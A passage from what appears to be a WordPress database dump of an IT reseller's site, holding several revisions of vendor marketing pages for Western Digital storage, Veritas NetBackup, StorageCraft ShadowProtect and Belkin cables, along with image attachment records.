underline;\">Mobility, Edge &amp; Computing</span></h4>\n<h4>Internal Drives</h4>\nOur internal drives are purpose-built to enable your data to thrive. We provide the speed, capacity, and performance, so you can drive innovation and satisfy new demands.\n<h4>Embedded &amp; Removable Flash</h4>\nData is everywhere multiplying at an astonishing rate. The complexity of data is driving innovation as businesses seek to extract more value and achieve new breakthroughs by harnessing the power of data.\n\n&nbsp;\n\n[maxbutton id=\"1\" ]','Western Digital','','inherit','closed','closed','','1617-autosave-v1','','','2018-12-14 12:21:58','2018-12-14 04:21:58','',1617,'https://bintara.com.my/blog/2018/12/14/1617-autosave-v1/',0,'revision','',0),(2158,1,'2018-12-14 12:22:16','2018-12-14 04:22:16','<h3>Data Readiness Can Lead to Business Transformation</h3>\r\n<h4></h4>\r\n<h4><span style=\"text-decoration: underline;\">Data Center</span></h4>\r\n<h4>Storage Systems</h4>\r\nUnleash the power of your data. With our comprehensive line up of storage systems - from all-flash, to hybrid to object storage - you can transform data into actionable information faster and achieve new levels of efficiency and costs.\r\n<h4>Storage Platforms</h4>\r\nBig Data. Fast Data. The digital universe continues to expand exponentially and so does its potential. We have a complete portfolio of storage platforms and servers designed to thrive under the most demanding performance and capacity needs.\r\n<h4>Data Center Drives</h4>\r\nAccelerate applications, analytics and data access with Western Digitalâ€™s broad portfolio of Ultrastar HDDs, SSDs and memory extension drives. The capacity and performance to help your data thrive.\r\n\r\n&nbsp;\r\n<h4><span style=\"text-decoration: underline;\">Mobility, Edge &amp; Computing</span></h4>\r\n<h4>Internal Drives</h4>\r\nOur internal drives are purpose-built to enable your data to thrive. We provide the speed, capacity, and performance, so you can drive innovation and satisfy new demands.\r\n<h4>Embedded &amp; Removable Flash</h4>\r\nData is everywhere multiplying at an astonishing rate. The complexity of data is driving innovation as businesses seek to extract more value and achieve new breakthroughs by harnessing the power of data.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Western Digital','','inherit','closed','closed','','1617-revision-v1','','','2018-12-14 12:22:16','2018-12-14 04:22:16','',1617,'https://bintara.com.my/blog/2018/12/14/1617-revision-v1/',0,'revision','',0),(2159,1,'2018-12-14 14:39:49','2018-12-14 06:39:49','<h3>The new NetBackup. The best just got better.</h3>\n<h3>Business Continuity</h3>\nDefy disasters and outages. Keep your business running.\n<h4>Disaster recovery planning guide</h4>\n<strong>Plan for what your business needs tomorrow.</strong>\nThe best business continuity plans are determined based on present and future business needs, not just static IT requirements. Make sure to build your plan from a business perspective.\n\n&nbsp;\n<h3>We solve your most important data protection problems.</h3>\n<h4>Ransomware</h4>\nProtect your business from malware that encrypts, or locks, valuable digital files and demands a ransom to release them.\n<h4>Modern Workloads</h4>\nSupport for Nutanix, Hadoop, VMware. NetBackup can do that.\n<h4>Software-Defined Storage</h4>\nSDS offers greater flexibility and choice, better economics and enterprise-class service levels.\n\n&nbsp;\n\n[maxbutton id=\"1\" ]','Veritas','','inherit','closed','closed','','1609-autosave-v1','','','2018-12-14 14:39:49','2018-12-14 06:39:49','',1609,'https://bintara.com.my/blog/2018/12/14/1609-autosave-v1/',0,'revision','',0),(2160,1,'2018-12-14 12:28:53','2018-12-14 04:28:53','<h3>The new NetBackup.\r\nThe best just got better.</h3>\r\n<h3>Business Continuity</h3>\r\nDefy disasters and outages. Keep your business running.\r\n<h4>Disaster recovery planning guide</h4>\r\n<strong>Plan for what your business needs tomorrow.</strong>\r\nThe best business continuity plans are determined based on present and future business needs, not just static IT requirements. Make sure to build your plan from a business perspective.\r\n\r\n&nbsp;\r\n<h4>We solve your most important data protection problems.</h4>\r\n<h4>Ransomware</h4>\r\nProtect your business from malware that encrypts, or locks, valuable digital files and demands a ransom to release them.\r\n<h4>Modern Workloads</h4>\r\nSupport for Nutanix, Hadoop, VMware. NetBackup can do that.\r\n<h4>Software-Defined Storage</h4>\r\nSDS offers greater flexibility and choice, better economics and enterprise-class service levels.','Veritas','','inherit','closed','closed','','1609-revision-v1','','','2018-12-14 12:28:53','2018-12-14 04:28:53','',1609,'https://bintara.com.my/blog/2018/12/14/1609-revision-v1/',0,'revision','',0),(2161,1,'2018-12-14 12:29:57','2018-12-14 04:29:57','<h3>The new NetBackup.\r\nThe best just got better.</h3>\r\n<h3>Business Continuity</h3>\r\nDefy disasters and outages. Keep your business running.\r\n<h4>Disaster recovery planning guide</h4>\r\n<strong>Plan for what your business needs tomorrow.</strong>\r\nThe best business continuity plans are determined based on present and future business needs, not just static IT requirements. Make sure to build your plan from a business perspective.\r\n\r\n&nbsp;\r\n<h4>We solve your most important data protection problems.</h4>\r\n<h4>Ransomware</h4>\r\nProtect your business from malware that encrypts, or locks, valuable digital files and demands a ransom to release them.\r\n<h4>Modern Workloads</h4>\r\nSupport for Nutanix, Hadoop, VMware. NetBackup can do that.\r\n<h4>Software-Defined Storage</h4>\r\nSDS offers greater flexibility and choice, better economics and enterprise-class service levels.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Veritas','','inherit','closed','closed','','1609-revision-v1','','','2018-12-14 12:29:57','2018-12-14 04:29:57','',1609,'https://bintara.com.my/blog/2018/12/14/1609-revision-v1/',0,'revision','',0),(2162,1,'2018-12-14 12:31:13','2018-12-14 04:31:13','<h3>The new NetBackup. The best just got better.</h3>\r\n<h3>Business Continuity</h3>\r\nDefy disasters and outages. Keep your business running.\r\n<h4>Disaster recovery planning guide</h4>\r\n<strong>Plan for what your business needs tomorrow.</strong>\r\nThe best business continuity plans are determined based on present and future business needs, not just static IT requirements. Make sure to build your plan from a business perspective.\r\n\r\n&nbsp;\r\n<h3>We solve your most important data protection problems.</h3>\r\n<h4>Ransomware</h4>\r\nProtect your business from malware that encrypts, or locks, valuable digital files and demands a ransom to release them.\r\n<h4>Modern Workloads</h4>\r\nSupport for Nutanix, Hadoop, VMware. NetBackup can do that.\r\n<h4>Software-Defined Storage</h4>\r\nSDS offers greater flexibility and choice, better economics and enterprise-class service levels.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Veritas','','inherit','closed','closed','','1609-revision-v1','','','2018-12-14 12:31:13','2018-12-14 04:31:13','',1609,'https://bintara.com.my/blog/2018/12/14/1609-revision-v1/',0,'revision','',0),(2163,1,'2018-12-14 12:56:59','2018-12-14 04:56:59','<div class=\"header-banner--slider slick-initialized slick-slider\" data-slick=\"{&quot;adaptiveHeight&quot;: &quot;true&quot;}\">\r\n<div class=\"slick-list draggable\">\r\n<div class=\"slick-track\">\r\n<div class=\"slick-slide slick-current slick-active\" data-slick-index=\"0\" aria-hidden=\"false\">\r\n<div class=\"slide\">\r\n<div class=\"bg-image paragraph paragraph--type--compound-header-banner paragraph--view-mode--default text-color-dark\">\r\n<div class=\"paragraph-content\">\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n<h3>Gain an Edge with StorageCraft</h3>\r\nYou stake your companyâ€™s reputation on the technologies you use. When customers are happy and see the value you bring, you see higher revenue and face less challenge from competition. Our data protection and storage solutions focus on helping you succeed. Fast, reliable recovery. Flexible managed services licensing. Support for physical and virtual systems. Centralized management. No wonder ShadowProtect<sup>Â®</sup>Â is considered the best recovery solution in the market.\r\n<h3><img class=\"alignnone size-full wp-image-2167\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ShadowProtect-Tab1_34266093.jpg\" alt=\"\" width=\"770\" height=\"390\" /></h3>\r\n<h3>ShadowProtect</h3>\r\nWith ShadowProtect, meet or beat your recovery time and recovery point objectives (RTOs and RPOs). Recover files and folders in minutes. Restore failed servers. Use patented VirtualBoot technology to instantly boot a backup image into a virtual machine.\r\n<h4>THE BEST IN RELIABLE DATA PROTECTION AND DISASTER RECOVERY</h4>\r\nPhysical or virtual, Windows or Linux, you won\'t find a faster, more reliable way to recover systems and data.\r\n<h4 class=\"field field--name-field-heading field--type-string field--label-hidden field-item\">One Solution for Your Data Protection Needs</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nLike disasters, IT environments are anything but standard. Thatâ€™s why businesses need a single cross-platform solution that protects a mixed, hybrid environment. ShadowProtect<sup>Â®</sup>Â backup and disaster recovery software ensures on-prem business systems and data are fully protected and always available.\r\n<h4>DISASTER RECOVERY</h4>\r\n<h4>ENSURE BUSINESS CONTINUES, NO MATTER WHAT HAPPENS</h4>\r\nPrepare your organization for the worst that Mother Nature or human nature can throw at it. When a site-wide disaster hits, be ready to recover with the help of our disaster recovery cloud.\r\n<h4><img class=\"alignnone wp-image-2165 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Cloud-Services-Component-560x373_0-300x171.jpeg\" alt=\"\" width=\"300\" height=\"171\" /></h4>\r\n<h4>Keep Systems and Data Always Safe and Available</h4>\r\nBusinesses canâ€™t be without their critical data for long. Yet, a large-scale disaster can readily disrupt systems and make doing business impossible. Building out your own data center for disaster recovery is costly. But StorageCraft Cloud Services<sup>â„¢</sup>lets you control costs by letting you customize services to fit business needs and budget. Plus youâ€™ll never be surprised with extra fees at the time of recovery. When the worst happens, know that data is safe, recoverable, and available.\r\n\r\n<img class=\"alignnone wp-image-2166 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Disaster-Recovery-Component-1-300x171.jpg\" alt=\"\" width=\"300\" height=\"171\" />\r\n<h4>With the Right Disaster Recovery Cloud, a Business Can Survive Anything</h4>\r\nStorageCraft Cloud Services stores copies of your backups in our cloud, and during a major disaster, you can quickly get critical operations running again. Recover data, virtualize machines, or even fail over an entire site and network in minutes.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','StorageCraft','','inherit','closed','closed','','1599-autosave-v1','','','2018-12-14 12:56:59','2018-12-14 04:56:59','',1599,'https://bintara.com.my/blog/2018/12/14/1599-autosave-v1/',0,'revision','',0),(2164,1,'2018-12-14 12:46:14','2018-12-14 04:46:14','<div class=\"header-banner--slider slick-initialized slick-slider\" data-slick=\"{&quot;adaptiveHeight&quot;: &quot;true&quot;}\">\r\n<div class=\"slick-list draggable\">\r\n<div class=\"slick-track\">\r\n<div class=\"slick-slide slick-current slick-active\" data-slick-index=\"0\" aria-hidden=\"false\">\r\n<div class=\"slide\">\r\n<div class=\"bg-image paragraph paragraph--type--compound-header-banner paragraph--view-mode--default text-color-dark\">\r\n<div class=\"paragraph-content\">\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n<h3>Gain an Edge with StorageCraft</h3>\r\nYou stake your companyâ€™s reputation on the technologies you use. When customers are happy and see the value you bring, you see higher revenue and face less challenge from competition. Our data protection and storage solutions focus on helping you succeed. Fast, reliable recovery. Flexible managed services licensing. Support for physical and virtual systems. Centralized management. No wonder ShadowProtect<sup>Â®</sup>Â is considered the best recovery solution in the market.\r\n<h3 class=\"field field--name-field-heading field--type-string field--label-hidden field-item h6\">ShadowProtect</h3>\r\n<h4 class=\"field field--name-field-sub-heading field--type-string field--label-hidden field-item h1\">The Best in Reliable Data Protection and Disaster Recovery</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nPhysical or virtual, Windows or Linux, you won\'t find a faster, more reliable way to recover systems and data.\r\n<h4 class=\"field field--name-field-heading field--type-string field--label-hidden field-item\">One Solution for Your Data Protection Needs</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nLike disasters, IT environments are anything but standard. Thatâ€™s why businesses need a single cross-platform solution that protects a mixed, hybrid environment. ShadowProtect<sup>Â®</sup>Â backup and disaster recovery software ensures on-prem business systems and data are fully protected and always available.\r\n\r\n&nbsp;\r\n<h3 class=\"field field--name-field-heading field--type-string field--label-hidden field-item h6\">Disaster Recovery</h3>\r\n<h4 class=\"field field--name-field-sub-heading field--type-string field--label-hidden field-item h1\">Ensure Business Continues, No Matter What Happens</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nPrepare your organization for the worst that Mother Nature or human nature can throw at it. When a site-wide disaster hits, be ready to recover with the help of our disaster recovery cloud.\r\n<h4>With the Right Disaster Recovery Cloud, a Business Can Survive Anything</h4>\r\nStorageCraft Cloud Services stores copies of your backups in our cloud, and during a major disaster, you can quickly get critical operations running again. Recover data, virtualize machines, or even fail over an entire site and network in minutes.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','StorageCraft','','inherit','closed','closed','','1599-revision-v1','','','2018-12-14 12:46:14','2018-12-14 04:46:14','',1599,'https://bintara.com.my/blog/2018/12/14/1599-revision-v1/',0,'revision','',0),(2165,1,'2018-12-14 12:50:12','2018-12-14 04:50:12','','Cloud-Services-Component-560x373_0','','inherit','closed','closed','','cloud-services-component-560x373_0','','','2018-12-14 12:50:12','2018-12-14 04:50:12','',1599,'https://bintara.com.my/wp-content/uploads/2018/12/Cloud-Services-Component-560x373_0.jpeg',0,'attachment','image/jpeg',0),(2166,1,'2018-12-14 12:50:45','2018-12-14 04:50:45','','Disaster-Recovery-Component-1','','inherit','closed','closed','','disaster-recovery-component-1','','','2018-12-14 12:50:45','2018-12-14 04:50:45','',1599,'https://bintara.com.my/wp-content/uploads/2018/12/Disaster-Recovery-Component-1.jpg',0,'attachment','image/jpeg',0),(2169,1,'2018-12-14 12:56:06','2018-12-14 04:56:06','<div class=\"header-banner--slider slick-initialized slick-slider\" data-slick=\"{&quot;adaptiveHeight&quot;: &quot;true&quot;}\">\r\n<div class=\"slick-list draggable\">\r\n<div class=\"slick-track\">\r\n<div class=\"slick-slide slick-current slick-active\" data-slick-index=\"0\" aria-hidden=\"false\">\r\n<div class=\"slide\">\r\n<div class=\"bg-image paragraph paragraph--type--compound-header-banner paragraph--view-mode--default text-color-dark\">\r\n<div class=\"paragraph-content\">\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n<h3>Gain an Edge with StorageCraft</h3>\r\nYou stake your companyâ€™s reputation on the technologies you use. When customers are happy and see the value you bring, you see higher revenue and face less challenge from competition. Our data protection and storage solutions focus on helping you succeed. Fast, reliable recovery. Flexible managed services licensing. Support for physical and virtual systems. Centralized management. No wonder ShadowProtect<sup>Â®</sup>Â is considered the best recovery solution in the market.\r\n<h3><img class=\"alignnone size-full wp-image-2167\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ShadowProtect-Tab1_34266093.jpg\" alt=\"\" width=\"770\" height=\"390\" /></h3>\r\n<h3>ShadowProtect</h3>\r\nWith ShadowProtect, meet or beat your recovery time and recovery point objectives (RTOs and RPOs). Recover files and folders in minutes. Restore failed servers. Use patented VirtualBoot technology to instantly boot a backup image into a virtual machine.\r\n<h4>THE BEST IN RELIABLE DATA PROTECTION AND DISASTER RECOVERY</h4>\r\nPhysical or virtual, Windows or Linux, you won\'t find a faster, more reliable way to recover systems and data.\r\n<h4 class=\"field field--name-field-heading field--type-string field--label-hidden field-item\">One Solution for Your Data Protection Needs</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nLike disasters, IT environments are anything but standard. Thatâ€™s why businesses need a single cross-platform solution that protects a mixed, hybrid environment. ShadowProtect<sup>Â®</sup>Â backup and disaster recovery software ensures on-prem business systems and data are fully protected and always available.\r\n<h4>DISASTER RECOVERY</h4>\r\n<h4>\r\nENSURE BUSINESS CONTINUES, NO MATTER WHAT HAPPENS</h4>\r\nPrepare your organization for the worst that Mother Nature or human nature can throw at it. When a site-wide disaster hits, be ready to recover with the help of our disaster recovery cloud.\r\n<h4><img class=\"alignnone wp-image-2165 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Cloud-Services-Component-560x373_0-300x171.jpeg\" alt=\"\" width=\"300\" height=\"171\" /></h4>\r\n<h4>Keep Systems and Data Always Safe and Available</h4>\r\nBusinesses canâ€™t be without their critical data for long. Yet, a large-scale disaster can readily disrupt systems and make doing business impossible. Building out your own data center for disaster recovery is costly. But StorageCraft Cloud Services<sup>â„¢</sup>lets you control costs by letting you customize services to fit business needs and budget. Plus youâ€™ll never be surprised with extra fees at the time of recovery. When the worst happens, know that data is safe, recoverable, and available.\r\n\r\n<img class=\"alignnone wp-image-2166 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Disaster-Recovery-Component-1-300x171.jpg\" alt=\"\" width=\"300\" height=\"171\" />\r\n<h4>With the Right Disaster Recovery Cloud, a Business Can Survive Anything</h4>\r\nStorageCraft Cloud Services stores copies of your backups in our cloud, and during a major disaster, you can quickly get critical operations running again. Recover data, virtualize machines, or even fail over an entire site and network in minutes.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','StorageCraft','','inherit','closed','closed','','1599-revision-v1','','','2018-12-14 12:56:06','2018-12-14 04:56:06','',1599,'https://bintara.com.my/blog/2018/12/14/1599-revision-v1/',0,'revision','',0),(2167,1,'2018-12-14 12:51:44','2018-12-14 04:51:44','','ShadowProtect-Tab1_34266093','','inherit','closed','closed','','shadowprotect-tab1_34266093','','','2018-12-14 12:51:44','2018-12-14 04:51:44','',1599,'https://bintara.com.my/wp-content/uploads/2018/12/ShadowProtect-Tab1_34266093.jpg',0,'attachment','image/jpeg',0),(2168,1,'2018-12-14 12:55:35','2018-12-14 04:55:35','<div class=\"header-banner--slider slick-initialized slick-slider\" data-slick=\"{&quot;adaptiveHeight&quot;: &quot;true&quot;}\">\r\n<div class=\"slick-list draggable\">\r\n<div class=\"slick-track\">\r\n<div class=\"slick-slide slick-current slick-active\" data-slick-index=\"0\" aria-hidden=\"false\">\r\n<div class=\"slide\">\r\n<div class=\"bg-image paragraph paragraph--type--compound-header-banner paragraph--view-mode--default text-color-dark\">\r\n<div class=\"paragraph-content\">\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n<h3>Gain an Edge with StorageCraft</h3>\r\nYou stake your companyâ€™s reputation on the technologies you use. When customers are happy and see the value you bring, you see higher revenue and face less challenge from competition. Our data protection and storage solutions focus on helping you succeed. Fast, reliable recovery. Flexible managed services licensing. Support for physical and virtual systems. Centralized management. No wonder ShadowProtect<sup>Â®</sup>Â is considered the best recovery solution in the market.\r\n<h3><img class=\"alignnone size-full wp-image-2167\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ShadowProtect-Tab1_34266093.jpg\" alt=\"\" width=\"770\" height=\"390\" /></h3>\r\n<h3>ShadowProtect</h3>\r\nWith ShadowProtect, meet or beat your recovery time and recovery point objectives (RTOs and RPOs). Recover files and folders in minutes. Restore failed servers. Use patented VirtualBoot technology to instantly boot a backup image into a virtual machine.\r\n<h4>THE BEST IN RELIABLE DATA PROTECTION AND DISASTER RECOVERY</h4>\r\nPhysical or virtual, Windows or Linux, you won\'t find a faster, more reliable way to recover systems and data.\r\n<h4 class=\"field field--name-field-heading field--type-string field--label-hidden field-item\">One Solution for Your Data Protection Needs</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nLike disasters, IT environments are anything but standard. Thatâ€™s why businesses need a single cross-platform solution that protects a mixed, hybrid environment. ShadowProtect<sup>Â®</sup>Â backup and disaster recovery software ensures on-prem business systems and data are fully protected and always available.\r\n\r\n&nbsp;\r\n<h4>DISASTER RECOVERY\r\nENSURE BUSINESS CONTINUES, NO MATTER WHAT HAPPENS</h4>\r\nPrepare your organization for the worst that Mother Nature or human nature can throw at it. When a site-wide disaster hits, be ready to recover with the help of our disaster recovery cloud.\r\n<h4><img class=\"alignnone wp-image-2165 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Cloud-Services-Component-560x373_0-300x171.jpeg\" alt=\"\" width=\"300\" height=\"171\" /></h4>\r\n<h4>Keep Systems and Data Always Safe and Available</h4>\r\nBusinesses canâ€™t be without their critical data for long. Yet, a large-scale disaster can readily disrupt systems and make doing business impossible. Building out your own data center for disaster recovery is costly. But StorageCraft Cloud Services<sup>â„¢</sup>lets you control costs by letting you customize services to fit business needs and budget. Plus youâ€™ll never be surprised with extra fees at the time of recovery. When the worst happens, know that data is safe, recoverable, and available.\r\n\r\n<img class=\"alignnone wp-image-2166 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Disaster-Recovery-Component-1-300x171.jpg\" alt=\"\" width=\"300\" height=\"171\" />\r\n<h4>With the Right Disaster Recovery Cloud, a Business Can Survive Anything</h4>\r\nStorageCraft Cloud Services stores copies of your backups in our cloud, and during a major disaster, you can quickly get critical operations running again. Recover data, virtualize machines, or even fail over an entire site and network in minutes.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','StorageCraft','','inherit','closed','closed','','1599-revision-v1','','','2018-12-14 12:55:35','2018-12-14 04:55:35','',1599,'https://bintara.com.my/blog/2018/12/14/1599-revision-v1/',0,'revision','',0),(2170,1,'2018-12-14 12:56:52','2018-12-14 04:56:52','<div class=\"header-banner--slider slick-initialized slick-slider\" data-slick=\"{&quot;adaptiveHeight&quot;: &quot;true&quot;}\">\r\n<div class=\"slick-list draggable\">\r\n<div class=\"slick-track\">\r\n<div class=\"slick-slide slick-current slick-active\" data-slick-index=\"0\" aria-hidden=\"false\">\r\n<div class=\"slide\">\r\n<div class=\"bg-image paragraph paragraph--type--compound-header-banner paragraph--view-mode--default text-color-dark\">\r\n<div class=\"paragraph-content\">\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n<h3>Gain an Edge with StorageCraft</h3>\r\nYou stake your companyâ€™s reputation on the technologies you use. When customers are happy and see the value you bring, you see higher revenue and face less challenge from competition. Our data protection and storage solutions focus on helping you succeed. Fast, reliable recovery. Flexible managed services licensing. Support for physical and virtual systems. Centralized management. No wonder ShadowProtect<sup>Â®</sup>Â is considered the best recovery solution in the market.\r\n<h3><img class=\"alignnone size-full wp-image-2167\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ShadowProtect-Tab1_34266093.jpg\" alt=\"\" width=\"770\" height=\"390\" /></h3>\r\n<h3>ShadowProtect</h3>\r\nWith ShadowProtect, meet or beat your recovery time and recovery point objectives (RTOs and RPOs). Recover files and folders in minutes. Restore failed servers. Use patented VirtualBoot technology to instantly boot a backup image into a virtual machine.\r\n<h4>THE BEST IN RELIABLE DATA PROTECTION AND DISASTER RECOVERY</h4>\r\nPhysical or virtual, Windows or Linux, you won\'t find a faster, more reliable way to recover systems and data.\r\n<h4 class=\"field field--name-field-heading field--type-string field--label-hidden field-item\">One Solution for Your Data Protection Needs</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nLike disasters, IT environments are anything but standard. Thatâ€™s why businesses need a single cross-platform solution that protects a mixed, hybrid environment. ShadowProtect<sup>Â®</sup>Â backup and disaster recovery software ensures on-prem business systems and data are fully protected and always available.\r\n<h4>DISASTER RECOVERY</h4>\r\n<h4>ENSURE BUSINESS CONTINUES, NO MATTER WHAT HAPPENS</h4>\r\nPrepare your organization for the worst that Mother Nature or human nature can throw at it. When a site-wide disaster hits, be ready to recover with the help of our disaster recovery cloud.\r\n<h4><img class=\"alignnone wp-image-2165 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Cloud-Services-Component-560x373_0-300x171.jpeg\" alt=\"\" width=\"300\" height=\"171\" /></h4>\r\n<h4>Keep Systems and Data Always Safe and Available</h4>\r\nBusinesses canâ€™t be without their critical data for long. Yet, a large-scale disaster can readily disrupt systems and make doing business impossible. Building out your own data center for disaster recovery is costly. But StorageCraft Cloud Services<sup>â„¢</sup>lets you control costs by letting you customize services to fit business needs and budget. Plus youâ€™ll never be surprised with extra fees at the time of recovery. When the worst happens, know that data is safe, recoverable, and available.\r\n\r\n<img class=\"alignnone wp-image-2166 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Disaster-Recovery-Component-1-300x171.jpg\" alt=\"\" width=\"300\" height=\"171\" />\r\n<h4>With the Right Disaster Recovery Cloud, a Business Can Survive Anything</h4>\r\nStorageCraft Cloud Services stores copies of your backups in our cloud, and during a major disaster, you can quickly get critical operations running again. Recover data, virtualize machines, or even fail over an entire site and network in minutes.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','StorageCraft','','inherit','closed','closed','','1599-revision-v1','','','2018-12-14 12:56:52','2018-12-14 04:56:52','',1599,'https://bintara.com.my/blog/2018/12/14/1599-revision-v1/',0,'revision','',0),(2851,1,'2019-02-07 16:13:16','2019-02-07 08:13:16','','Evolve','','inherit','closed','closed','','evolve','','','2019-02-07 16:13:16','2019-02-07 08:13:16','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg',0,'attachment','image/jpeg',0),(2700,1,'2018-12-21 15:31:49','2018-12-21 07:31:49','<h3>THE BELKIN DIFFERENCE</h3>\r\n<h4>Innovation, with quality at its core</h4>\r\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\r\n<h4>Global leader in tech.</h4>\r\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\r\n<h4>Always looking to the future</h4>\r\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\r\n<h4>An unwavering commitment to earning your trust.</h4>\r\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\r\n<h4>Unmatched performance, every time</h4>\r\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\r\n<h4>We believe good design matters.</h4>\r\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4>Product : -</h4>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2329\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2330\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\r\n\r\nUltra HD High Speed HDMIÂ® Cable\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2331\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nGold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2332\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nMini DisplayPortTM to VGA\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nMicro HDMI Adapter\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2335\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB A/B Device Cable * A/B;DSTP\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2336\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.5 mm Audio + Charge RockStarâ„¢\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2337\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2338\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)\r\n\r\n[maxbutton id=\"9\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2339\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" 